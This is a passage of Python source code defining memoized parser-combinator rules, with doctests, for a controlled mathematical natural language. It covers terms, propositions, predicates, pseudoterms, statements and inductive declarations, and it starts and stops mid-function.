return Etok(name='alt_case',etoks=(p,t),raw=acc)
return (c.next_type('ALT') + get_lookup_parse('prop') + c.next_type('ASSIGN') + get_lookup_parse('plain_term')).treat(f,'alt_case')
@memo
def case_term():
"""Parser for a case term
>>> pstream(case_term(),'case | PROP := PLAIN_TERM end')
Etok(case_term,'case | PROP := PLAIN_TERM end')
"""
def f(acc):
((_,a),_)=acc
a= c.retreat_list(alt_case().plus(),[lib.fflatten(a)])
return Etok(name='case_term',etoks=a[0],raw=acc)
return (c.next_word('case')+ c.balanced_condition(not_end) +c.next_word('end')).treat(f,'case_term')
@memo
def app_term():
"""Parser for a function applied to arguments
"""
def f(acc):
return Etok(name='app_term',etoks=acc,raw=acc)
return (tightest_term() + app_args()).treat(f,'app_term')
@memo
def match_pats():
return c.plus_comma(get_lookup_parse('plain_term'))
@memo
def alt_match():
"""Parser for a single alternative in match term"""
def f(acc):
(((_,p),_),p2)=acc
return Etok(name='alt_match',etoks=(p,p2),raw=acc)
return (c.next_type('ALT')+match_pats()+c.next_type('ASSIGN')+get_lookup_parse('plain_term')).treat(f,'alt_match')
@memo
def match_term():
"""Parser for a match term
>>> pstream(match_term(),'match PLAIN_TERM with | PLAIN_TERM := PLAIN_TERM end')
Etok(match_term,'match PLAIN_TERM with | PLAIN_TERM := PLAIN_TERM end')
"""
def f(acc):
((((_,mp),_),b),_)=acc
b = c.retreat_list(alt_match().plus(),[lib.fflatten(b)])
return Etok(name='match_term',etoks=(mp,b[0]),raw=acc)
return (next_word('match') + match_pats() + next_word('with') +
c.balanced_condition(not_end) + next_word('end')
).treat(f,'match_term')
@memo
def match_function():
"""parser for a function with match statement
>>> pstream(match_function(),'function | PLAIN_TERM := PLAIN_TERM end')
Etok(match_function,'function | PLAIN_TERM := PLAIN_TERM end')
"""
def f(acc):
((((_,t),o),b),_)=acc
b = c.retreat_list(alt_match().plus(),[lib.fflatten(b)])
return Etok(name='match_function',etoks=(t,o,b),raw=acc)
return (next_word('function') + args_template() +
opt_colon_type() + c.balanced_condition(not_end) +
next_word('end')).treat(f,'match_function')
@memo
def alt_term():
"""Parser for term following the '| ... end' template"""
return first(case_term() , match_term() , match_function())
# opentail_term - later
@memo
def lambda_term():
"""Parser for lambda abstraction
>>> pstream(lambda_term(),'TDOP_TERM \mapsto OPENTAIL_TERM')
Etok(mapsto,'TDOP_TERM \mapsto OPENTAIL_TERM')
>>> pstream(lambda_term(),'fun TIGHTEST_EXPR := OPENTAIL_TERM')
Etok(fun_term,'fun TIGHTEST_EXPR := OPENTAIL_TERM')
"""
def f1(acc):
((t,_),o)=acc
return Etok(name='mapsto',etoks=(t,o),raw=acc)
def f2(acc):
(((p,a),_),o)=acc
return Etok(name='lambda_term',etoks=(p,a,o),raw=acc)
def f3(acc):
(((_,t),_),o)=acc
return Etok(name='fun_term',etoks=(t,o),raw=acc)
return first((get_lookup_parse('tdop_term') + c.next_type('MAPSTO') + get_lookup_parse('opentail_term')).treat(f1,'mapsto') ,
(get_lookup_parse('prim_lambda_binder') + tightest_args() + binder_comma() + get_lookup_parse('opentail_term')).treat(f2,'lambda_term') ,
(next_word('fun')+ tightest_args() + c.next_type('ASSIGN') + get_lookup_parse('opentail_term')).treat(f3,'fun_term')
)
@memo
def let_term():
"""Parser for let ....
>>> pstream(let_term(),'let x := PLAIN_TERM in OPENTAIL_TERM')
Etok(let,'let x := PLAIN_TERM in OPENTAIL_TERM')
"""
def f(acc):
(((((_,p),_),t),_),o)=acc
return Etok(name='let',etoks=(p,t,o),raw=acc)
return (next_word('let') + tightest_prefix() +
c.next_type('ASSIGN') + get_lookup_parse('plain_term') + next_word('in') + get_lookup_parse('opentail_term')).treat(f,'let_term')
@memo
def if_then_else_term():
"""Parse 'if bool then A else B'
>>> pstream(if_then_else_term(),'if PROP then PLAIN_TERM else OPENTAIL_TERM')
Etok(if_then_else_term,'if PROP then PLAIN_TERM else OPENTAIL_TERM')
"""
def f(acc):
(((((_,p),_),t),_),f)=acc
return Etok(name='if_then_else_term',etoks=(p,t,f),raw=acc)
return (next_word('if') + get_lookup_parse('prop') +
next_word('then') + get_lookup_parse('plain_term') + next_word('else') + get_lookup_parse('opentail_term')).treat(f,'if_then_else_term')
@memo
def opentail_term():
"""Recursive parser for terms with open tails.
These are terms that can be iterated as in
let x := y in let u:= v in tail
if b then t else if b2 then t2 else tail
Specifically, this includes lambdas, let, if_then, tdop
>>> pstream(opentail_term(),'let x := PLAIN_TERM in OPENTAIL_TERM')
Etok(let,'let x := PLAIN_TERM in OPENTAIL_TERM')
"""
return first(c.lazy_call(lambda_term) ,
c.lazy_call(let_term) ,
c.lazy_call(if_then_else_term) ,
get_lookup_parse('tdop_term')
)
@memo
def where_suffix():
"""suffix to Haskell 'where'
>>> pstream(where_suffix(),'where { x : POST_COLON_TYPE := TERM ; y := TERM }')
Etok(where_suffix,'where { x : POST_COLON_TYPE := TERM ; y := TERM }')
"""
#def f_inner(acc):
# ((a,b),c)=acc
# return (a,b,c)
#def f(acc):
# (_,(_,b,_))=acc
# b=c.retreat_list((var()+opt_colon_type()+assign_expr().possibly()).treat(f_inner),b[0::2])
# return Etok(name='where_suffix',etoks=b,raw=acc)
#return (next_word('where') + c.brace_semif()).treat(f,'where_suffix')
def f(acc):
(_,(_,bs,_))=acc
bs = [(a,b,c) for ((a,b),c) in bs[0::2]]
return Etok(name='where_suffix',etoks=bs,raw=acc)
p = (var()+opt_colon_type()+assign_expr().possibly())
return (next_word('where') + c.brace(p.plus(semicolon))).treat(f,'where_suffix')
@memo
def where_term():
"""Parser for term with (possible) Haskell style where suffix
>>> pstream(where_term(),'TDOP_TERM where {x : POST_COLON_TYPE := TERM }')
Etok(where_term,'TDOP_TERM where { x : POST_COLON_TYPE := TERM }')
"""
def f(acc):
return Etok('where_term',etoks=acc,raw=acc)
return (opentail_term() + where_suffix().possibly()).treat(f,'where_term')
@memo
def term_op():
"""Parser for symbolic operators
>>> pstream(term_op(),'PRIM_TERM_OP_CONTROLSEQ { TERM } {TERM }')
Etok(cs_brace,prim_term_op_controlseq,'PRIM_TERM_OP_CONTROLSEQ { TERM } { TERM }')
"""
return first(get_lookup_parse('prim_term_op') ,
cs_brace(get_lookup_parse('prim_term_op_controlseq'))
)
@memo
def term_ops():
return term_op().plus()
@memo
def definite_term():
"""term with a definite article, subsuming where_term
>>> pstream(definite_term(),'the PRIM_DEFINITE_NOUN')
Etok(prim_definite_noun,backdoor1,'the PRIM_DEFINITE_NOUN')
"""
def f(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
return first(where_term() ,
(next_word('the') + get_lookup_parse('prim_definite_noun')).treat(f,'definite_term')
)
@memo
def any_args():
def f(acc):
b = acc[0::2]
return Etok(name='any_args',etoks=b,raw=acc)
return c.plus_comma(var() | annotated_vars()).treat(f,'any_args')
@memo
def any_name():
"""Parse for terms with forthel
natural language quantification
every x, each x, all x, no x, some x,...
>>> pstream(any_name(),'every x, y, z')
Etok(any_name,'every x , y , z')
"""
def f(acc):
return Etok(name='any_name',etoks=acc,raw=acc)
return (lit_any() +
first(any_args() ,
get_lookup_parse('pseudoterm') ,
get_lookup_parse('general_type'))).treat(f,'any_name')
@memo
def term():
"""parser for terms, subsuming all other terms (through definite_term)"""
def f(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
return first((get_lookup_parse('prim_classifier').possibly() + definite_term()).treat(f,'term') ,
any_name())
@memo
def terms():
def f(acc):
return Etok(name='terms',etoks=acc[0::2],raw=acc)
return c.plus_andcomma(term()).treat(f,'terms')
def isplains(etoks):
"""Boolean test if a (nested) list of Etok is plain.
    All elements must be Etoks (or be falsy, in which case they are skipped).
"""
return all(isplain(e) for e in lib.fflatten(etoks) if e)
def isplain(etok):
"""Boolean test if an Etok is plain.
Input must be an Etok.
"""
if tokenlib.is_lex(etok):
return True
if etok.name=='any_name':
return False
return isplains(etok.etoks)
@memo
def plain_term():
"""
Following Forthel 1.3.3,
a plain_term contains no any_name recursively within it.
We implement this with a separate check that the term is plain,
rather than build plain terms as a separate nonterminal.
We require plain terms on the right-hand-side of definitions.
Also, in dependent types, the terms should be plain.
"""
return term().if_test(isplain)
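# Illustrative contrast (a sketch, not a doctest): 'TERM' passes the
# isplain test, while a term built from any_name, such as 'every x',
# should be rejected by plain_term even though term() accepts it.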
@memo
def tdop_term():
"""Parser for an expression involving symbolic operators.
tdop = top down operator precedence,
which is how such expressions will eventually be handled.
Here we just collect together the tokens in the expression
for later handling.
In the expression, there are no adjacent non-symbolic terms.
That is, f x + y is interpreted as function application of f to x...
There can be adjacent symbols: 3! + 1.
The expression can optionally begin or end with a symbol.
The expression might be a solitary symbol or app_term.
There are three general precedence categories built into
the grammar.
* prop operators; (precedence < 0)
* binary relation operators such as "="; (precedence=0)
* term operators. (precedence > 0) (this case).
This allows us to distinguish terms from props and types.
>>> pstream(tdop_term(),'x PRIM_TERM_OP y')
Etok(tdop_term,'x PRIM_TERM_OP y')
"""
def f(acc):
(((p,o),ao),tp)=acc
r=[o]+ao
if p:
r =[p]+r
if tp:
r=r+[tp]
return Etok('tdop_term',etoks=r,raw=acc)
return first((app_term().possibly() + term_ops() +
(app_term() + term_ops()).many() +
app_term().possibly()).treat(f,'tdop_term') ,
app_term()
)
@memo
def adjective_left_attribute():
def f(acc):
return Etok(name='adjective_left_attribute',etoks=acc,raw=acc)
return (next_word('non').treat(Etok.etok).possibly() + get_lookup_parse('prim_simple_adjective')).treat(f,'adjective_left_attribute')
@memo
def multisubject_left_attribute():
return (get_lookup_parse('prim_simple_adjective_multisubject'))
@memo
def left_attribute():
return first(adjective_left_attribute() ,
multisubject_left_attribute())
@memo
def is_right_attribute():
def f(acc):
return Etok(name='is_right_attribute',etoks=acc[0::2],raw=acc)
return c.plus_andcomma(get_lookup_parse('is_pred')).treat(f,'is_right_attribute')
@memo
def does_right_attribute():
def f(acc):
(_,t)=acc
return Etok(name='does_right_attribute',etoks=t[0::2],raw=acc)
return (next_word('that') + c.plus_andcomma(get_lookup_parse('does_pred'))).treat(f,'does_right_attribute')
@memo
def such_that_right_attribute():
def f(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
return (c.next_phrase('such that') + get_lookup_parse('statement')).treat(f,'such_that_right_attribute')
@memo
def right_attribute():
return first(is_right_attribute() , does_right_attribute() , such_that_right_attribute())
def attribute(p):
"""Parser for a term with left and right attributes
"""
def f(acc):
return Etok(name='attribute',etoks=acc,raw=acc)
return (left_attribute().many() + p + right_attribute().possibly()).treat(f,'attribute')
@memo
def general_type():
"""parser for a general type.
This is one of the main nonterminals.
It subsumes all specialized type nonterminals.
"""
return attribute(opentail_type())
@memo
def binary_relation_op():
"""binary relation symbols"""
return first(get_lookup_parse('prim_binary_relation_op') ,
cs_brace(get_lookup_parse('prim_binary_relation_controlseq'))
)
# deprecated, now part of tdop_rel_prop
#def tdop_terms():
# def f(acc):
# return Etok(name='tdop_terms',etoks=acc[0::2],raw=acc)
# return c.plus_andcomma(tdop_term).treat(f,'tdop_terms')
@memo
def tdop_rel_prop():
"""Parser for terms chained by binary relation symbols.
All symbols have the same precedence 0.
We allow x,y < z < w. The first arg can be a list of terms.
The chain expands as x < z and y < z and z < w.
output contains the list [x<z,y<z,z<w] (coded as Etoks)
No parentheses allowed in chain.
>>> pstream(tdop_rel_prop(),'x,y,z PRIM_BINARY_RELATION_OP u PRIM_BINARY_RELATION_OP x')
Etok(tdop_rel_prop,'x , y , z PRIM_BINARY_RELATION_OP u PRIM_BINARY_RELATION_OP x')
"""
def f(acc):
(t,ls)=acc
#expand chain
op0 = [(a,r0,t0) for a in t[0::2] for (r0,t0) in ls[0:1]] #chain comma
op1 = [(a,r0,t0) for ((_,a),(r0,t0)) in zip(ls[:-1],ls[1:])]
return Etok(name='tdop_rel_prop',etoks=op0+op1,raw=acc)
return (c.plus_andcomma(tdop_term()) + (binary_relation_op() + tdop_term()).plus()).treat(f,'tdop_rel_prop')
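# Illustrative sketch (an addition; the helper name and sample data are
# hypothetical): the same chain expansion performed on plain tuples, with
# 'x','y' standing in for parsed terms and [('<','z'),('<','w')] for the
# (op,term) chain, mirroring the comprehensions in f above.
def _expand_chain(first_terms, chain):
    head = [(a, r, t) for a in first_terms for (r, t) in chain[:1]]
    rest = [(t_prev, r, t) for ((_, t_prev), (r, t)) in zip(chain[:-1], chain[1:])]
    return head + rest
# _expand_chain(['x', 'y'], [('<', 'z'), ('<', 'w')])
#   -> [('x','<','z'), ('y','<','z'), ('z','<','w')]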
@memo
def prop_op():
"""Parser for propositional connectives
>>> pstream(prop_op(),'PRIM_PROPOSITIONAL_OP')
Etok(prim_propositional_op,backdoor1,'PRIM_PROPOSITIONAL_OP')
"""
return first(
get_lookup_parse('prim_propositional_op') ,
cs_brace(get_lookup_parse('prim_propositional_op_controlseq'))
)
@memo
def tdop_prop():
"""Parser for operators among props, such
as and, or, implies.
precedence is negative.
It must be infix (possibly with multiple ops).
For example, a symbolic negation is not included.
subsumes binder_prop
output etoks: binder_props in even positions, ops in odd positions
>>> pstream(tdop_prop(),'BINDER_PROP PRIM_PROPOSITIONAL_OP BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP PRIM_PROPOSITIONAL_OP BINDER_PROP')
"""
def f(acc):
(b,m)=acc
return Etok(name='tdop_prop',etoks=[b]+lib.flatten(m),raw=acc)
return (get_lookup_parse('binder_prop') +
(prop_op().plus() + get_lookup_parse('binder_prop')).many()).treat(f,'tdop_prop')
@memo
def identifier_prop():
"""Parser for identifiers of type prop"""
return get_lookup_parse('prim_relation')
@memo
def annotated_prop():
"""Parser for prop, annotated as prop
>>> pstream(annotated_prop(),'(PROP : Prop)')
Etok(annotated_prop,'( PROP : prop )')
"""
def f(acc):
(_,((p,_),_),_) =acc
return Etok('annotated_prop',etoks=[p],raw=acc)
return c.paren(get_lookup_parse('prop')+colon + rawprop).treat(f,'annotated_prop')
@memo
def field_prop():
"""
Parser for prop obtained as dotted c.f, where the field f has type prop
Debug: should we add app_args (and move to app_args): c.f (x)?
"""
def f(acc):
return Etok(name='field_prop',etoks=acc,raw=acc)
return (tightest_term() + get_lookup_parse('prim_field_prop_accessor')).treat(f,'field_prop')
@memo
def prop_var():
"""parser for propositional var"""
def f(acc):
return Etok(name='prop_var',etoks=[acc],raw=acc)
return var().treat(f,'prop_var')
@memo
def tightest_prop():
"""Parser for tightly bound propositional statements"""
def f(acc):
(_,s,_)=acc
return Etok.rawupdate(s,acc)
return first(c.paren(get_lookup_parse('statement')).treat(f) ,
identifier_prop() ,
prop_var() ,
annotated_prop() ,
field_prop()
)
@memo
def app_prop():
"""parser for predicate application"""
def f(acc):
return Etok(name='app_prop',etoks=acc,raw=acc)
    return (tightest_prop() + app_args()).treat(f,'app_prop')
@memo
def lambda_predicate():
"""parser for lambda term with values in prop
>>> pstream(lambda_predicate(),'fun TIGHTEST_EXPR : Prop := (STATEMENT)')
Etok(lambda_predicate,'fun TIGHTEST_EXPR : prop := ( STATEMENT )')
"""
def f(acc):
#return acc
(((((_,t),_),_),_),p)=acc
return Etok(name='lambda_predicate',etoks=(t,p),raw=acc)
return (next_word('fun')+ tightest_args() + colon + rawprop +
c.next_type('ASSIGN') + tightest_prop()
).treat(f,'lambda_predicate')
@memo
def binder_prop():
"""Recursive parser for props with (optional) binders (universal, etc.)
Subsumes various other kinds of props.
>>> pstream(binder_prop(),'PRIM_BINDER_PROP TIGHTEST_EXPR , A')
Etok(binder_prop,'PRIM_BINDER_PROP TIGHTEST_EXPR , A')
"""
def f(acc):
(((b,a),_),b2)=acc
return Etok(name='binder_prop',etoks=(b,a,b2),raw=acc)
return first(app_prop() ,
tdop_rel_prop() ,
lambda_predicate() ,
( get_lookup_parse('prim_binder_prop') +
args_template() + binder_comma() +
c.lazy_call(binder_prop)
).treat(f,'binder_prop')
)
@memo
def prop():
"""Parser for prop.
This is one of the main nonterminals.
It subsumes all specialized prop nonterminals.
The classifier is a sort of meta sort, which is currently ignored.
It might be a word such as 'predicate'
>>> pstream(prop(),'BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP')
"""
def f(acc):
(_,t)=acc
return t
return (get_lookup_parse('prim_classifier').possibly() + tdop_prop()).treat(f,'prop')
# install binder_prop,prop
# statements...
@memo
def possessed_noun():
return (attribute(get_lookup_parse('prim_possessed_noun')))
@memo
def has_pred():
"""Parser for has_pred or its negation.
Note that commas may appear in both attributes
and the list of has_pred, but the parse should be unambiguous
because of the articles.
>>> pstream(has_pred(),'the PRIM_POSSESSED_NOUN and the PRIM_POSSESSED_NOUN')
Etok(has_pred,'the PRIM_POSSESSED_NOUN and the PRIM_POSSESSED_NOUN')
"""
def f1(acc):
t = [p for (_,p) in acc[0::2]] # drop commas, articles
return Etok(name='has_pred',etoks=t,raw=acc)
def f2(acc):
return Etok(name='no_has_pred',etoks=acc,raw=acc)
return first(c.plus_andcomma(lit('article') + possessed_noun()).treat(f1,'has_pred') ,
(next_word('no') + possessed_noun()).treat(f2,'has_no_pred')
)
enot = next_word('not').treat(Etok.etok,'not')
@memo
def is_aPred():
"""Parser for nominal predicates
>>> pstream(is_aPred(),'not a TIGHTEST_TYPE')
Etok(indefinite_pred,'not a TIGHTEST_TYPE')
"""
def f1(acc):
((n,_),g)=acc
return Etok(name='indefinite_pred',etoks=(n,g),raw=acc)
def f2(acc):
return Etok(name='definite_pred',etoks=acc,raw=acc)
return first((enot.possibly() + lit('a').possibly() + general_type()).treat(f1,'indefinite_pred') ,
(enot.possibly() + definite_term()).treat(f2,'definite_pred')
)
@memo
def is_pred():
"""Parser for adjectival predicates
>>> pstream(is_pred(),'not PRIM_ADJECTIVE')
Etok(is_adjective,'not PRIM_ADJECTIVE')
>>> pstream(is_pred(),'not pairwise PRIM_ADJECTIVE_MULTISUBJECT')
Etok(is_adjective_multisubject,'not pairwise PRIM_ADJECTIVE_MULTISUBJECT')
>>> pstream(is_pred(),'having the PRIM_POSSESSED_NOUN')
Etok(is_with,'having the PRIM_POSSESSED_NOUN')
"""
def f1(acc):
return Etok(name='is_adjective',etoks=acc,raw=acc)
def f2(acc):
((n,p),m)=acc
return Etok(name='is_adjective_multisubject',etoks=(n,p,m),raw=acc)
def f3(acc):
return Etok(name='is_with',etoks=acc[1:],raw=acc) ##
return first(
(enot.possibly() + get_lookup_parse('prim_adjective')).treat(f1,'is_adjective') ,
(enot.possibly() + next_word('pairwise').treat(Etok.etok).possibly() + get_lookup_parse('prim_adjective_multisubject')).treat(f2,'is_adjective_multisubject') ,
(lit('with') + has_pred()).treat(f3,'is_with')
)
@memo
def does_pred():
"""Parser for verbal predicates.
Umbrella for various verbal, adjectival, nominal predicates.
"""
def f1(acc):
((_,n),v)=acc
return Etok(name='do_verb',etoks=(n,v),raw=acc)
def f2(acc):
((_,n),v)=acc
return Etok(name='do_verb_multisubject',etoks=(n,v),raw=acc)
def f3(acc):
(_,h)=acc
return Etok(name='do_has_pred',etoks=[h],raw=acc)
def f4(acc):
(_,ps)=acc
return Etok(name='does_is_adj',etoks=ps,raw=acc)
def f5(acc):
(_,ps)=acc
return Etok(name='is_nominal',etoks=ps,raw=acc)
return first(
(lit('do').possibly() + enot.possibly() + get_lookup_parse('prim_verb')).treat(f1,'do_verb') ,
(lit('do').possibly() + enot.possibly() + get_lookup_parse('prim_verb_multisubject')).treat(f2,'do_verb_multisubject') ,
(lit('has') + has_pred()).treat(f3,'do_has_pred') ,
(lit('is') + c.plus_andcomma(is_pred())).treat(f4,'does_is_adj') ,
(lit('is') + c.plus_andcomma(is_aPred())).treat(f5,'is_nominal')
)
# pseudoterms here
@memo
def plain_pred_pseudoterm():
"""Parser for a pseudoterm.
A pseudoterm is not a term in the grammar.
It is a term-like entity that can be
quantified over by extracting the
free variables from the pseudoterm and
quantifying over them.
For example, 'for all x,y < 5'.
The output is checked to be plain.
>>> pstream(plain_pred_pseudoterm(),'x, y = u, holding x')
Etok(plain_pred_pseudoterm,'x , y = u , holding x')
"""
def f(acc):
(_,t,_)=acc
return Etok(name='plain_pred_pseudoterm',etoks=t,raw=acc)
return c.opt_paren(tdop_rel_prop() + holding_vars().possibly()).if_test(isplains).treat(f,'plain_pred_pseudo_term')
#def predicate_pseudoterm():
# """Parse a plain_pred_pseudoterm with attribute"""
# return attribute(plain_pred_pseudoterm())
#def attribute_pseudoterm():
# """Parser for a pseudoterm with attribute"""
# return attribute(pseudoterm_without_attribute())
@memo
def pseudoterm_without_attribute():
"""Recursive parser for various pseudoterms
>>> pstream(pseudoterm_without_attribute(),'x of type TIGHTEST_TYPE')
Etok(annotated,'x of type TIGHTEST_TYPE')
>>> pstream(attribute(pseudoterm_without_attribute()),'x')
Etok(attribute,'x')
"""
def f2(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
def f3(acc):
((v,_),ann)=acc
return Etok('annotated',etoks=(v,ann),raw=acc)
def f5(acc):
(_,ps,_)=acc
return Etok.rawupdate(ps,acc)
return first(get_lookup_parse('prim_typed_name') ,
(get_lookup_parse('prim_classifier') + tvar()).treat(f2,'pseudoterm-2') ,
(var() + (lit('with') + next_word('type')) + opentail_type()).treat(f3,'pseudoterm-3') ,
tvar() , #after: var with...
c.paren(c.lazy_call(pseudoterm_without_attribute)).treat(f5,'pseudoterm-5')
)
@memo
def pseudoterm():
"""
Parser for pseudoterm.
This is the principal nonterminal for pseudoterm,
subsuming others.
"""
def f(acc):
return Etok(name='pseudoterm',etoks=acc,raw=acc)
return first(attribute(pseudoterm_without_attribute()) ,
attribute(plain_pred_pseudoterm()) ).treat(f,'pseudoterm')
# statements
comma_and = comma + next_word('and')
comma_or = comma + next_word('or')
filler = phrase_list_filler().possibly()
@memo
def simple_statement():
"""Parser for simple statement"""
def f(acc):
return Etok(name='simple_statement',etoks=acc,raw=acc)
    return (terms() + does_pred().plus(next_word('and'))).treat(f,'simple_statement')
@memo
def there_is_statement():
"""Parser for pseudoterm existence"""
def f(acc):
(((_,_),n),p)=acc
return Etok(name='there_is_statement',etoks=(n,p),raw=acc)
return (next_word('there')+lit('exist')+next_word('no').possibly()+pseudoterm()).treat(f,'there_is_statement')
@memo
def const_statement():
def f(acc):
return Etok(name='const_statement',etoks=acc,raw=acc)
    return first((next_word('the').possibly() + next_word('thesis')) ,
                 (lit('article').possibly() + lit('contradiction'))).treat(f,'const_statement')
@memo
def symbol_statement():
"""Recursive parser for first-order-logic like statements
Debug: should parse blocks of binders in single pass.
>>> pstream(symbol_statement(),'BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP')
>>> pstream(symbol_statement(),'BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP')
>>> pstream(symbol_statement(),'forall x, BINDER_PROP')
Etok(forall_symbol_statement,'forall x , BINDER_PROP')
"""
def f_forall(acc):
(((_,a),_),s)=acc
return Etok(name='forall_symbol_statement',etoks=(a,s),raw=acc)
def f_exist(acc):
(((_,a),_),s)=acc
return Etok(name='exist_symbol_statement',etoks=(a,s),raw=acc)
def f_not(acc):
return Etok(name='not_symbol_statement',etoks=acc[1],raw=acc)
def f(acc):
(_,s,_)=acc
return Etok.rawupdate(s,acc)
return first(
prop() ,
(lit('forall') + pseudoterm() + binder_comma() + c.lazy_call(symbol_statement)).treat(f_forall,'forall_statement') ,
(lit('exist') + pseudoterm() + binder_comma() + c.lazy_call(symbol_statement)).treat(f_exist,'exist') ,
(next_word('not') + c.lazy_call(symbol_statement)).treat(f_not,'not') ,
(c.paren(c.lazy_call(symbol_statement))).treat(f,'symbol_statement')
)
@memo
def primary_statement():
"""Parser for primary statement"""
return first(
simple_statement() ,
there_is_statement() ,
(filler + const_statement()).treat(lib.snd) ,
(filler + symbol_statement()).treat(lib.snd)
)
@memo
def head_primary():
return first(get_lookup_parse('head_statement') ,
primary_statement())
@memo
def or_chain():
"""Parser for chain of or statements"""
def f(acc):
((p,_),h)=acc
return Etok(name='or_chain',etoks=p[0::2]+[h],raw=acc)
return (primary_statement().plus(comma_or) + comma_or + head_primary()).treat(f,'or_chain')
@memo
def and_chain():
"""Parser for chain of and statements"""
def f(acc):
((p,_),h)=acc
return Etok(name='and_chain',etoks=p[0::2]+[h],raw=acc)
return (primary_statement().plus(comma_and) + comma_and + head_primary()).treat(f,'and_chain')
@memo
def andor_chain():
"""Parser for chain of and/or statements"""
return first(and_chain() , or_chain() , primary_statement()
).name('andor_statement')
@memo
def chain_statement():
"""Parser for chain of and/or/iff statements"""
def f(acc):
(((_,ao,_),_),s)=acc
return Etok('iff_statement',etoks=(ao,s),raw=acc)
return first(andor_chain () ,
(c.paren(andor_chain()) + lit('iff') + get_lookup_parse('statement')).treat(f,'iff_statement')
).name('chain_statement')
@memo
def head_statement():
"""Parser for if/then, negation, for ..., statements
We distinguish between if-then statements and if-then terms.
"""
def f_for(acc):
(((_,p),_),s)=acc
return Etok(name='for_statement',etoks=(p,s),raw=acc)
def f_ifthen(acc):
((((_,s),_),_),s2)=acc
return Etok(name='if_then_statement',etoks=(s,s2),raw=acc)
def f_wrong(acc):
return Etok(name='wrong_statement',etoks=acc[1:],raw=acc)
return first(
# DEBUG: use quasiterm instead of any_name?
(next_word('for') + c.plus_andcomma(any_name()) + binder_comma() + get_lookup_parse('statement')).treat(f_for,'for_statement') ,
(next_word('if')+ get_lookup_parse('statement') + comma + next_word('then') + get_lookup_parse('statement')).treat(f_ifthen,'if_then_statement') ,
(lit('wrong') + get_lookup_parse('statement')).treat(f_wrong,'wrong_statement')
).name('head_statement')
@memo
def statement():
"""Parser for statement.
This subsumes other specialized statements."""
return first(head_statement() , chain_statement()).name('statement')
# next texts
@memo
def namespace():
"""Not implemented. Always fails."""
return Parse.fail()
@memo
def synonym_item():
"""Parser for synonym item as text item
>>> pstream(synonym_item(),'we introduce synonyms rough/-en, tilde/ tildilla.')
Etok(instruction,synonym,'we introduce synonym rough /- en , tilde / tildilla .')
"""
pre = next_word('we').possibly() + next_word('introduce').possibly() + next_word('synonyms')
def f(acc):
((_,b),_)=acc
b1 = c.retreat_list(Instruction.syn(),[b])
return Etok.rawupdate(b1[0],acc)
return (pre + c.balanced_condition(not_period) + period).commit(pre).treat(f)
@memo
def inductive_decl():
"""Parser for declaration of induction types.
It terminates with 'end' keyword.
Identifier must be located internally because of recursion.
>>> pstream(inductive_decl(),'inductive integer | id : POST_COLON_TYPE end')
Etok(inductive_decl,'inductive integer | id : POST_COLON_TYPE end')
"""
def f(acc):
(((((_,i),a),s),c1),_)=acc
#print(f'c1={c1}')
c1 = c.retreat_list(_opt_alt_constructor().many(),[lib.fflatten(c1)])
return Etok(name='inductive_decl',etoks=(i,a,s,c1),raw=acc)
return (c.next_word('inductive') + identifier() + args_template() + opt_colon_sort() +
c.balanced_condition(not_end) + c.next_word('end')).treat(f,'inductive_decl')
@memo
def mutual_inductive_decl_item():
"""DEBUG: not tested"""
pre = lit('declare_mutual_inductive_decl')
def f(acc):
(((_,w),pa),_)=acc
if pa:
pa = pa[1]
return Etok('mutual_inductive_decl_item',etoks=(w[0::2],pa),raw=acc)
return (pre + c.plus_comma(atomic()) +
(lit('param') + args_template()).possibly() + period
).commit(pre).treat(f,'mutual_inductive_decl_item')
@memo
def mutual_inductive_def_item():
"""DEBUG: not tested"""
pre = lit('declare_mutual_inductive_def')
def f(acc):
(((_,w),pa),_)=acc
if pa:
pa = pa[1]
return Etok('mutual_inductive_def_item',etoks=(w[0::2],pa),raw=acc)
return (pre + c.plus_comma(atomic()) +
(lit('param') + args_template()).possibly() + period
).commit(pre).treat(f,'mutual_inductive_def_item')
def moreover_implements_deprecated():
"""DEBUG: not tested.
Deprecated. Add predicate satisfaction instead.
    Parser for an item that extends a structure or
    inductive type with additional fields."""
def f(acc):
(((((_,_),g),_),b),_)=acc
b = c.reparse_list(field(),b[0::2])
return (g,b)
return (next_word('moreover') + comma + general_type() +
lit('implement') + c.brace_semif() +
period).treat(f,'moreover_implements')
def this_exists_deprecated():
"""parsing of 'this'-directives.
    DEBUG: Remove this feature. Deprecated. Unfinished.
"""
def adjective(tok):
        s1 = tok.value.lower().replace('_','')
return s1 in ['unique','canonical','welldefined','wellpropped','total','exhaustive']
def this_directive_right_attr():
return next_phrase('by recursion')
def this_directive_pred():
# debug, need to slice [0::2]
return c.plus_andcomma(Parse.next_token().if_test(adjective))
return first_phrase(['this exist','this is'])
@memo
def satisfy_item():
"""
Parser for item that extends a given type with
a unique existence statement, used in satisfaction-style
structural typing of structures.
This is used to define coercions say from a
metric space to topological space.
The statement should be exists unique.
DEBUG: A pseudoterm might be too general.
We want expressions like (G:group) or group G ...
>>> pstream(satisfy_item(),'Every (G: POST_COLON_TYPE) satisfies BINDER_PROP.')
Etok(satisfy_item,'every ( G : POST_COLON_TYPE ) satisfy BINDER_PROP .')
"""
def f(acc):
(((p,f),s),_)=acc
if f:
(_,f,_)=f
return Etok('satisfy_item',etoks=(p,f,s),raw=acc)
pre = next_word('every') + pseudoterm() +lit('satisfy')
return (pre + c.opt_paren(field_prefix()).possibly() + statement() + period).commit(pre,'satisfy_item').treat(f,'satisfy_item')
@memo
def then_prefix():
return lit('then').possibly()
# no memo, takes an argument
def decl_label(s:str):
"""
Sample input for decl_label('axiom')
Axiom.
Conjecture Riemann.
Sample input for decl_label('theorem')
Theorem Pappus.
>>> pstream(decl_label('axiom'),'Equation 90.')
Etok(decl_label,'equation 90 .')
"""
def f(acc):
((a,l),_)=acc
return Etok(name='decl_label',etoks=(a,l),raw=acc)
return (lit(s)+label().possibly() + period).treat(f)
@memo
def let_annotation_prefix():
"""Parser for initial segment of a let statement.
>>> pstream(let_annotation_prefix(),'let u,v,w be fixed ...')
Etok(let_annotation_prefix,'let u , v , w be fixed')
"""
def f(acc):
((((l,vs),_),_),f)=acc
if f:
l=f
vs = vs[0::2]
